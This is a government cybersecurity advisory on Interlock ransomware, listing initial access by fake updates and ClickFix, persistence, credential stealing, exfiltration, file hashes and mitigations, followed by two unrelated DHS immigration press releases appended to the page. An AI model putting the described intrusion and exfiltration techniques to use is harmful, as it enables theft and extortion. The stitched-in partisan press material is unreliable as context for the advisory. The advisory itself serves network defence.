Category: NCTC Speeches, Testimonies and Interviews

Source: US Department of Homeland Security

Summary

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC)—hereafter referred to as “the authoring organizations”—are releasing this joint advisory to disseminate known Interlock ransomware IOCs and TTPs identified through FBI investigations (as recently as June 2025) and trusted third-party reporting.

The Interlock ransomware variant was first observed in late September 2024, targeting various business, critical infrastructure, and other organizations in North America and Europe. FBI maintains these actors target their victims based on opportunity, and their activity is financially motivated. FBI is aware of Interlock ransomware encryptors designed for both Windows and Linux operating systems; these encryptors have been observed encrypting virtual machines (VMs) across both operating systems. FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups. Actors were also observed using the ClickFix social engineering technique for initial access, in which victims are tricked into executing a malicious payload under the guise of fixing an issue on the victim’s system. Actors then use various methods for discovery, credential access, and lateral movement to spread to other systems on the network.

Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, which increases pressure on victims to pay the ransom to both get their data decrypted and prevent it from being leaked. 

FBI, CISA, HHS, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Interlock ransomware incidents.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for tables mapped to the threat actors’ activity.

Overview

Since September 2024, Interlock ransomware actors have impacted a wide range of businesses and critical infrastructure sectors in North America and Europe. These actors are opportunistic and financially motivated in nature and employ tactics to infiltrate and disrupt the victim’s ability to provide their essential services. 

Interlock actors leverage a double extortion model, in which they both encrypt and exfiltrate victim data. Ransom notes do not include an initial ransom demand or payment instructions; instead, victims are provided with a unique code and are instructed to contact the ransomware group via a .onion URL through the Tor browser. To date, Interlock actors have been observed encrypting VMs, leaving hosts, workstations, and physical servers unaffected; however, this does not mean they will not expand to these systems in the future. To counter Interlock actors’ threat to VMs, enterprise defenders should implement robust endpoint detection and response (EDR) tooling and capabilities.

The authoring agencies are aware of emerging open-source reporting detailing similarities between the Rhysida and Interlock ransomware variants.¹ For additional information on Rhysida ransomware, see the joint advisory, #StopRansomware: Rhysida Ransomware.

Initial Access

FBI has observed Interlock actors obtaining initial access [TA0001] via drive-by download [T1189] from compromised legitimate websites, an atypical method for ransomware actors. Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software (see Table 5 for a list of filenames).²

In some instances, FBI has observed Interlock actors using the ClickFix social engineering technique, in which unsuspecting users are prompted to execute a malicious payload by clicking a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) [T1189]. The CAPTCHA contains instructions for users to open the Windows Run window, paste the clipboard contents, and then execute a malicious Base64-encoded PowerShell process [T1204.004].³

Note: This ClickFix technique has been used in several other malware campaigns, including Lumma Stealer and DarkGate.⁴

Execution and Persistence

Based on FBI investigations, the fake Google Chrome browser executable functions as a remote access trojan (RAT) [T1105] designed to execute a PowerShell script [T1059.001] that drops a file into the Windows Startup folder. From there, the file is designed to run the RAT every time the victim logs in [T1547.001], establishing persistence [TA0003]. 

FBI also observed instances in which Interlock actors executed a PowerShell command designed to establish persistence via a Windows Registry key modification [T1547.001]. To do so, Interlock actors used a PowerShell command [T1059.001] designed to add a run key value named “Chrome Updater” [T1036.005] that uses a specific log file as an argument upon user login.

Reconnaissance

To facilitate reconnaissance, a PowerShell script executes a series of commands [T1059.001] designed to gather information on victim machines (see Table 1).

Table 1. PowerShell Commands for Reconnaissance

PowerShell Command	Description
WindowsIdentity.GetCurrent()	Returns a WindowsIdentity object that represents the current Windows user [T1033].
systeminfo	Displays detailed configuration information [T1082] about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties.
tasklist/svc	Lists unabridged service information [T1007] for each process currently running on the local computer.
Get-Service	Gets objects that represent the services [T1007] on a computer, including running and stopped services.
Get-PSDrive	Gets the drives [T1082] in the current session, such as: Windows logical drives on the computer, including drives mapped to network shares. Drives exposed by PowerShell providers. Session-specified temporary drives and persistent mapped network drives.
arp -a	Displays and modifies entries in the Address Resolution Protocol (ARP) cache table [T1016], which contains entries on the IPv4 and IPv6 addresses on host endpoints.

Command and Control

FBI observed Interlock actors using command and control (C2) [TA0011] applications like Cobalt Strike and SystemBC. Interlock actors also used Interlock RAT⁵ and NodeSnake RAT (as of March 2025)⁶ for C2 and executing commands.

Credential Access, Lateral Movement, and Privilege Escalation

FBI observed that once Interlock actors establish remote control of a compromised system, they use a series of PowerShell commands to download a credential stealer (cht.exe) [TA0006] and keylogger binary (klg.dll) [T1056.001],[T1105]. According to open source reporting, the credential stealer collects login information and associated URLs for victims’ online accounts [T1555.003], while the keylogger dynamic link library (DLL) logs users’ keystrokes in a file named conhost.txt [T1036.005].⁷ As of February 2025, private cybersecurity analysts also observed Interlock ransomware infections executing different versions of information stealers [TA0006], including Lumma Stealer⁸ and Berserk Stealer, to harvest credentials for lateral movement and privilege escalation [T1078].⁹

Interlock actors leverage compromised credentials and Remote Desktop Protocol (RDP)¹⁰ [T1021.001] to move between systems. They also use tools like AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement [T1219].¹¹ In addition to stealing users’ online credentials, Interlock actors have compromised domain administrator accounts (possibly by using a Kerberoasting attack [T1558.003])¹² to gain additional privileges [T1078.002]. 

Collection and Exfiltration

Interlock actors leverage Azure Storage Explorer (StorageExplorer.exe) to navigate victims’ Microsoft Azure Storage accounts [T1530] prior to exfiltrating data. According to open source reporting, Interlock actors execute AzCopy to exfiltrate data by uploading it to the Azure storage blob [T1567.002].¹³ Interlock actors also exfiltrate data over file transfer tools, including WinSCP [T1048].

Impact

Following data exfiltration, Interlock actors deploy the encryption binary as a 64-bit executable named conhost.exe [T1486],[T1036.005]. FBI has observed Interlock ransomware encryptors for both Windows and Linux operating systems. Encryptors are designed to encrypt files using a combined Advanced Encryption Standard (AES) and Rivest-Shamir-Adleman (RSA) algorithm. In addition, cybersecurity researchers have identified Interlock ransomware samples using a FreeBSD ELF encryptor [T1486], a departure from usual Linux encryptors designed for VMware ESXi servers and VMs.¹⁴

A cybersecurity company identified a DLL binary named tmp41.wasd—executed after encryption using rundll32.exe [T1218.011]—which uses the remove() function to delete the encryption binary [T1070.004];¹⁵ on Linux machines, the encryptor uses a similar technique to execute the removeme function. 

Encrypted files are appended with either a .interlock or .1nt3rlock file extension, alongside a ransom note titled !__README__!.txt delivered via group policy object (GPO). Interlock actors use a double-extortion model [T1657], encrypting systems after exfiltrating data. The ransom note provides each victim with a unique code and instructions to contact the ransomware actors via a .onion URL. 

Interlock actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. The actors instruct victims to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors. The actors threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand; the actors have previously followed through on this threat.¹⁶

See Table 2 for publicly available tools and applications used by Interlock ransomware actors. This includes legitimate tools repurposed for their operations.

Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

Table 2. Tools Used by Interlock Ransomware Actors

Tool Name	Description
AnyDesk	A common legitimate remote monitoring and management (RMM) tool maliciously used by Interlock actors to obtain remote access and maintain persistence. AnyDesk also supports remote file transfer.
Cobalt Strike	A penetration testing tool used by security professionals to test the security of networks and systems.
PowerShell	A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
PSExec	A tool designed to run programs and execute commands on remote systems.
PuTTY.exe	An open source file transfer application commonly used to remotely connect to systems via Secure Shell (SSH). PuTTY also supports file transfer protocols like Secure File Transfer Protocol (SFTP) and Secure Copy Protocol (SCP).
ScreenConnect	A remote support, access, and meeting software that allows users to control devices remotely over the internet. CISA observed Interlock actors using a cracked version of this software in at least one incident. These versions may be standalone versions not connecting to ScreenConnect’s official cloud domains (domains available upon request from ConnectWise).
SystemBC	Enables Interlock actors to compromise systems, run commands, download malicious payloads, and act as a proxy tool to the actors’ C2 servers.
Windows Console Host	Windows Console Host (conhost.exe) manages the user interface for command-line applications in Windows, including Command Prompt and PowerShell.
WinSCP	A free and open source SSH File Transfer Protocol (FTP), WebDAV, Amazon S3, and secure copy protocol client.

See Table 3 and Table 4 for files used by Interlock ransomware actors. These were obtained from FBI investigations as recently as June 2025.

Disclaimer: Some of the hashes are for legitimate tools and applications and should not be attributed as malicious without analytical evidence to support threat actor use and/or control. The authoring agencies recommend organizations investigate or vet these hashes prior to taking action, such as blocking.

Table 3. Files Used by Interlock Ransomware Actors (SHA-256)

File Name	Hash
1.ps1	fba4883bf4f73aa48a957d894051d78e0085ecc3170b1ff50e61ccec6aeee2cd
advanced_port_scanner.exe	4b036cc9930bb42454172f888b8fde1087797fc0c9d31ab546748bd2496bd3e5
Aisa.exe	18a507bf1c533aad8e6f2a2b023fbbcac02a477e8f05b095ee29b52b90d47421
AnyDesk.exe	1a70f4eef11fbecb721b9bab1c9ff43a8c4cd7b2cafef08c033c77070c6fe069
autoservice.dll	a4069aa29628e64ea63b4fb3e29d16dcc368c5add304358a47097eedafbbb565
Autostart.exe	d535bdc9970a3c6f7ebf0b229c695082a73eaeaf35a63cd8a0e7e6e3ceb22795
cht	FAFCD5404A992850FFCFFEE46221F9B2FF716006AECB637B80E5CD5AA112D79C
cht.exe	C20BABA26EBB596DE14B403B9F78DDC3C13CE9870EEA332476AC2C1DD582AA07
cleanup.dll (SystemBC)	1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127
conhost	44887125aa2df864226421ee694d51e5535d8c6f70e327e9bcb366e43fd892c1
conhost.dll	a70af759e38219ca3a7f7645f3e103b13c9fb1db6d13b68f3d468b7987540ddf
conhost.dll	96babe53d6569ee3b4d8fc09c2a6557e49ebc2ed1b965abda0f7f51378557eb1
difxepi.dll (SystemBC)	1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127
iexplore.exe	d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb
klg.dll	A4F0B68052E8DA9A80B70407A92400C6A5DEF19717E0240AC608612476E1137E
!!!OPEN_ME!!!.txt	68A49D5A097E3850F3BB572BAF2B75A8E158DADB70BADDC205C2628A9B660E7A
processhacker-2.39-bin.zip	88f26f3721076f74996f8518469d98bf9be0eaee5b9eccc72867ebfc25ea4e83
PsExec.exe	078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
putty.exe	7a43789216ce242524e321d2222fa50820a532e29175e0a2e685459a19e09069
puttyportable.exe	97931d2e2e449ac3691eb526f6f60e2f828de89074bdac07bd7dbdfd51af9fa0
PuTTYPortable.zip	ff7ad2376ae01e4b3f1e1d7ae630f87b8262b5c11bc5d953e1ac34ffe81401b5
qrpce91.exe.asd	64a0ab00d90682b1807c5d7da1a4ae67cde4c5757fc7d995d8f126f0ec8ae983
ScreenConnect.ClientService.exe	2814b33ce81d2d2e528bb1ed4290d665569f112c9be54e65abca50c41314d462
SophosendpointAgent.exe	f51b3d054995803d04a754ea3ff7d31823fab654393e8054b227092580be43db
SophosScaner.exe	dfb5ba578b81f05593c047f2c822eeb03785aecffb1504dcb7f8357e898b5024
Starship.exe	94bf0aba5f9f32b9c35e8dfc70afd8a35621ed6ef084453dc1b10719ae72f8e2
start	28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f
start.exe	70bb799557da5ac4f18093decc60c96c13359e30f246683815a512d7f9824c8f
StorageExplorer.exe	73a9a1e38ff40908bcc15df2954246883dadfb991f3c74f6c514b4cffdabde66
Sysmon.sys	1d04e33009bcd017898b9e1387e40b5c04279c02ebc110f12e4a724ccdb9e4fb
upd_2327991.exe	7b9e12e3561285181634ab32015eb653ab5e5cfa157dd16cdd327104b258c332
webujgd.lnk	70EE22D394E107FBB807D86D187C216AD66B8537EDC67931559A8AEF18F6B5B3
WinSCP-6.3.5-Setup.exe	8eb7e3e8f3ee31d382359a8a232c984bdaa130584cad11683749026e5df1fdc3
Proxy Tool	e4d6fe517cdf3790dfa51c62457f5acd8cb961ab1f083de37b15fd2fddeb9b8f
Encryptor	e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1
Encryptor	c733d85f445004c9d6918f7c09a1e0d38a8f3b37ad825cd544b865dba36a1ba6
Encryptor	28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f

Table 4. Files Used by Interlock Ransomware Actors (SHA-1)

File Name	Hash
autorun.log	514946a8fc248de1ccf0dbeee2108a3b4d75b5f6
jar.jar	b625cc9e4024d09084e80a4a42ab7ccaa6afb61d
pack.jar	3703374c9622f74edc9c8e3a47a5d53007f7721e

See Table 5 through Table 16 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 5. Initial Access

Technique Title	ID	Use
Drive-By Compromise	T1189	Interlock actors obtain initial access by compromising a legitimate website that network users visit, or by disguising malicious payloads as fake browser updates or common security software, including the following:17 FortiClient.exe Ivanti-Secure-Access-Client.exe GlobalProtect.exe Webex.exe AnyConnectVPN.exe Cisco-Secure-Client.exe zyzoom_antimalware.exe Interlock actors also gain access via the ClickFix social engineering technique, in which users are tricked into executing a malicious payload by clicking on a fake CAPTCHA that prompts users to execute a malicious PowerShell script.

Table 6. Execution

Technique Title	ID	Use
Command and Scripting Interpreter: PowerShell	T1059.001	Interlock actors implement PowerShell scripts to drop a malicious file into the Windows Startup folder. Interlock actors execute a PowerShell command for registry key modification. Interlock actors use a PowerShell script to execute a series of commands to facilitate reconnaissance.
User Execution: Malicious Copy and Paste	T1204.004	Via the ClickFix social engineering technique, users are tricked into clicking a fake CAPTCHA and prompted into executing a malicious Base64-encoded PowerShell process by following instructions to open a Windows Run window (Windows Button + R), pasting clipboard contents (“CTRL + V”), and then executing the malicious script (“Enter”).

Table 7. Persistence

Technique Title	ID	Use
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder	T1547.001	Interlock actors establish persistence by adding a file into a Windows StartUp folder that executes a RAT every time a user logs in. Interlock actors also implement registry key modification by using a PowerShell command to add a run key value (named “Chrome Updater”) that uses a log file as an argument every time a user logs in.

Table 8. Privilege Escalation

Technique Title	ID	Use
Valid Accounts: Domain Accounts	T1078.002	Interlock actors compromise domain administrator accounts to gain additional privileges.

Table 9. Defense Escalation

Technique Title	ID	Use
Defense Evasion	TA0005	Interlock actors execute the removeme function on Linux systems to delete the encryption binary for defense evasion.
Masquerading: Match Legitimate Resource Name or Location	T1036.005	Interlock actors disguise a malicious run key value by naming it “Chrome Updater”; the run key value uses a specific log file as an argument upon user login. Interlock actors disguise files of keystrokes logged by one of their credential stealers with a legitimate Windows filename: conhost.txt. Interlock actors disguise an encryption binary, a 64-bit executable, by giving it the same name as the legitimate Console Windows Host executable: conhost.exe
System Binary Proxy Execution: Rundll32	T1218.011	Interlock actors use rundll32.exe to proxy execution of a malicious DLL binary tmp41.wasd.
Indicator Removal: File Deletion	T1070.004	Interlock actors execute a DLL binary tmp41.wasd that uses the remove() function to delete their encryption binary for defense evasion.

Table 10. Credential Access

Technique Title	ID	Use
Credential Access	TA0006	Interlock actors download credential stealer cht.exe and execute other versions information stealers (including Lumma Stealer and Berserk Stealer) to harvest credentials.
Credentials from Password Stores: Credentials from Web Browsers	T1555.003	Interlock actors download a credential stealer that collects login information and associated URLs for victims’ online accounts.
Input Capture	T1056	Interlock actors execute Lumma Stealer and Berserk Stealer information stealers on victim systems.
Input Capture: Keylogging	T1056.001	Interlock actors download klg.dll, a keylogger binary, onto compromised systems, where it logs users’ keystrokes in a file named conhost.txt.
Steal or Forge Kerberos Tickets: Kerberoasting	T1558.003	Interlock actors possibly use a Kerberoasting attack to compromise domain administrator accounts.

Table 11. Discovery

Technique Title	ID	Use
System Owner/User Discovery	T1033	Interlock actors execute a PowerShell command WindowsIdentity.GetCurrent() on victim systems to retrieve a WindowsIdentity object that represents the current Windows user.
System Information Discovery	T1082	Interlock actors execute a PowerShell command systeminfo on victim systems to access detailed configuration information about the system, including OS configuration, security information, product ID, and hardware properties. Interlock actors execute a PowerShell command Get-PSDrive on victim systems to discover the drives in the current session, such as:  Windows logical drives on the computer, including drives mapped to network shares. Drives exposed by PowerShell providers. Session-specified temporary drives and persistent mapped network drives.
System Service Discovery	T1007	Interlock actors execute a PowerShell command tasklist /svc on victim systems that lists service information for each process currently running on the system.  Actors also execute a PowerShell command Get-Service on victim systems that retrieves objects that represent the services (including running and stopped services) on the system.
System Network Configuration Discovery	T1016	Interlock actors execute a PowerShell command arp -a on victim systems that displays and modifies entries in the Address Resolution Protocol (ARP) cache table (which contains entries on the IPv4 and IPv6 addresses on host endpoints).

Table 12. Lateral Movement

Technique Title	ID	Use
Valid Accounts	T1078	Interlock actors harvest and abuse valid credentials for lateral movement and privilege escalation.
Remote Services: Remote Desktop Protocol	T1021.001	Interlock actors use RDP and valid credentials to move laterally between systems.

Table 13. Collection

Technique Title	ID	Use
Data from Cloud Storage	T1530	Interlock actors use StorageExplorer.exe, the cloud storage solution Azure Storage Explorer, to explore Microsoft Azure Storage accounts.

Table 14. Command and Control

Technique Title	ID	Use
Command and Control	TA0011	Interlock actors use applications Cobalt Strike and SystemBC for C2.
Ingress Tool Transfer	T1105	Interlock actors use a fake Google Chrome or Microsoft Edge browser update to cause users to execute a RAT on the victimized system. Interlock actors download credential stealers (cht.exe) and keylogger binaries (klg.dll) once actors establish remote control of a compromised system.
Remote Access Tools	T1219	Interlock actors use legitimate remote access tools such as AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement.

Table 15. Exfiltration

Technique Title	ID	Use
Exfiltration Over Web Service: Exfiltration to Cloud Storage	T1567.002	Interlock actors exfiltrate data to cloud storage by executing AzCopy to upload data to the Azure storage blob.
Exfiltration Over Alternative Protocol	T1048	Interlock actors use file transfer tools like WinSCP to exfiltrate data.

Table 16. Impact

Technique Title	ID	Use
Data Encrypted for Impact	T1486	Interlock actors encrypt victim data using a combined AES and RSA algorithm on compromised systems to interrupt availability to system and network resources. Actors code encryptors using C/C++. Interlock actors use encryptors for both Windows and Linux operating systems.  Interlock actors also use a FreeBSD ELF encryptor to encrypt victim data.
Financial Theft	T1657	Interlock actors deliver a ransom note titled !__README__!.txt via a GPO which provides victims with instructions to use a .onion URL to contact the actors over the Tor network. Actors use a double-extortion model, both encrypting victim data and threatening release of victim data on their Tor network leak site if the ransom is not paid.

The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Interlock ransomware actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.

In addition to the below mitigations, Healthcare and Public Health (HPH) organizations should use HPH Sector CPGs to implement cybersecurity protections to address the most common threats and TTPs used against this sector.

At-risk organizations should implement the following mitigations:

• Prevent Interlock ransomware actors from obtaining initial access:
  • Implement domain name system (DNS) filtering to block users from accessing malicious sites and applications.
  • Implement web access firewalls to mitigate and prevent unknown commands or process injection from malicious domains or websites.
  • Train users [CPG 2.I] to identify, avoid, and report social engineering attempts.
• Implement a recovery plan [CPG 5.A] to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.R].
• Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST password standards.
  • Require employees to use long passwords [CPG 2.B] and consider not requiring recurring password changes, as these can weaken security.
• Require MFA [CPG 2.H] for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems.
  • Implement ICAM policies across the organization as a precursor to MFA.
• Keep all operating systems, software, and firmware up to date; prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Timely patching is efficient and cost effective for minimizing an organization’s exposure to cybersecurity threats.
• Implement robust EDR capabilities on VMs, systems, and networks.
• Segment networks [CPG 2.F] to prevent the spread of ransomware.
  • Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
• Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware [CPG 3.A] with a networking monitoring tool [CPG 2.T].
  • To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network.
  • Implement EDR tools; these are useful for detecting lateral connections as they provide insight into common and uncommon network connections for each host.
• Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems.
  • This prevents threat actors from directly connecting to remote access services that they have established for persistence.
• Install, regularly update, and enable real time detection for antivirus software on all hosts.
• Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
• Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
• Disable unused ports.
• Consider adding an email banner to emails received from outside of your organization [CPG 2.M].
• Disable hyperlinks in received emails.
• Implement time-based access for accounts set at the admin level and higher; for example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model):
  • This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need.
  • Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
• Disable command line and scripting activities and permissions [CPG 2.N].
  • Disabling software utilities that run from the command line makes it more difficult for threat actors to escalate privileges and move laterally.
• Maintain offline backups of data and regularly maintain backups and restorations [CPG 2.R]; this avoids severe service interruption and irretrievable data in the event of a compromise.
• Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.R].

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

1. Select an ATT&CK technique described in this advisory (see Table 5 through Table 16).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.

FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

The authoring agencies do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (contact@mail.cisa.dhs.gov) or by calling 1-844-Say-CISA (1-844-729-2472).

State, local, tribal, and territorial governments should report incidents to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).

HPH Sector organizations should report incidents to FBI or CISA but also can reach out to HHS at HHScyber@hhs.gov for cyber incident support focused on mitigating adverse patient impacts.

The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the authoring agencies. 

Cisco Talos contributed to this advisory.

July 22, 2025: Initial version.

¹ Elio Biasiotto, et. al., “Unwrapping the Emerging Interlock Ransomware Attack,” Talos Intelligence (blog), Cisco Talos, last modified November 7, 2024, https://blog.talosintelligence.com/emerging-interlock-ransomware/.

² Sekoia Threat Detection and Research team, “Interlock Ransomware Evolving Under the Radar,” Sekoia (blog), Sekoia, last modified April 16, 2025, https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/.

³ Yashvi Shah and Vignesh Dhatchanamoorthy, “ClickFix Deception: A Social Engineering Tactic to Deploy Malware,” McAfee Labs (blog), McAfee,last modified June 11, 2024, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/ and “HC3 Sector Alert: ClickFix Attacks,” Health Sector Cybersecurity Coordination Center, Department of Health and Human Services, last modified October 29, 2024, https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf.

⁴ Shah, “ClickFix Deception: A Social Engineering Tactic to Deploy Malware.”

⁵ Sekoia Threat Detection and Research team, “Interlock Ransomware Evolving Under the Radar.”

⁶ Bill Toulas, “Interlock Ransomware Gang Deploys New NodeSnake RAT on Universities,“ Bleeping Computer, May 28, 2025, https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-deploys-new-nodesnake-rat-on-universities/.

⁷ Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

⁸ International law-enforcement and Microsoft took down the Lumma Stealer malware in May 2025 by seizing internet domains the actors used to distribute the malware to actors and taking down domains that hosted the malware’s infrastructure. For more information, see Tara Seals, “Lumma Stealer Takedown Reveals Sprawling Operation,” Dark Reading, May 21, 2025, https://www.darkreading.com/cybersecurity-operations/lumma-stealer-takedown-sprawling-operation, and Steven Masada, “Disrupting Lumma Stealer: Microsoft Leads Global Action Against Favored Cybercrime Tool,” Microsoft On the Issues (blog), Microsoft, last modified May 21, 2025, https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/.

⁹ Sekoia Threat Detection and Research team, “Interlock Ransomware Evolving Under the Radar.”

¹⁰ Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

¹¹ Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

¹² Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

¹³ Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

¹⁴ Lawrence Abrams, “Meet Interlock — The New Ransomware Targeting FreeBSD Servers,” Bleeping Computer, November 3, 2024, https://www.bleepingcomputer.com/news/security/meet-interlock-the-new-ransomware-targeting-freebsd-servers/.

¹⁵ Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

¹⁶ Graham Cluley, “Interlock Ransomware: What You Need to Know,” Fortra (blog), Fortra, last modified May 30, 2025, https://www.tripwire.com/state-of-security/interlock-ransomware-what-you-need-know.

¹⁷ Sekoia Threat Detection and Research team, “Interlock Ransomware Evolving Under the Radar.”

Source: US Department of Homeland Security

70% of ICE’s arrests have been of illegal aliens convicted or charged with crimes

WASHINGTON – Today, the Department of Homeland Security (DHS) highlighted U.S. Immigration and Customs Enforcement (ICE) officers’ arrests of the worst of the worst criminal illegal aliens from across the United States.  

“President Trump and Secretary Noem have unleashed ICE to target the worst of the worst. Our brave law enforcement is facing an 830% increase in assaults against them and yet they continue to arrest violent criminals and drug traffickers every single day,” said Assistant Secretary Tricia McLaughlin. We will not allow sanctuary politicians, activist hacks, or rioters stand in our way of protecting the American people. Our message is clear: criminal illegal aliens are not welcome in the United States.”  

• ICE Baltimore arrested Olinda Micaela Gonzalez-Ortiz, a 21-year-old illegal alien from Guatemala. Her criminal history includes a conviction for hit and run in Salisbury, MD. 

Image

• ICE Denver arrested Federico Fong-Nunez, a 53-year-old illegal alien from Mexico. He has 21 criminal convictions including burglary, aggravated assault, and felony menacing, in Boulder, CO

Image

• ICE Los Angeles arrested Luis Alberto Leonardo Cortes-Rivera, a 34-year-old illegal alien from Mexico. He has nine criminal convictions including grand theft, burglary, and tampering with a vehicle, in Los Angeles, CA. 

Image

• ICE Dallas arrested Rureiro Falkao, a 46-year-old illegal alien from Honduras. His criminal history includes conviction for possession of methamphetamine, in Oklahoma City, OK. 

Image

• ICE Houston arrested Jhon Jervis Chavez-De La Rosa, a 21-year-old illegal alien from Venezuela. His criminal history includes a conviction of assault causing bodily injury, in Houston, TX. 

Image

###

Source: US Department of Homeland Security

The media fell for another hoax designed to demonize ICE law enforcement

WASHINGTON – Today, the Department of Homeland Security (DHS) set the record straight on misleading and false reporting that U.S. Immigration and Customs Enforcement (ICE) “secretly deported” a so-called “Allentown grandfather” to Guatemala. Additionally, reporting claimed he “died” in ICE custody.

The Morning Call, an Allentown, Pennsylvania, newspaper published the following headline on July 20, 2025, without any facts from DHS about major allegations made against law enforcement:

Image

The family of the individual allegedly told reporters he was handcuffed and taken by federal officers at a green card appointment in Philadelphia. This claim is completely false. There is no record of the man appearing at any green card appointment in or around the area of Philadelphia on June 20, 2025.

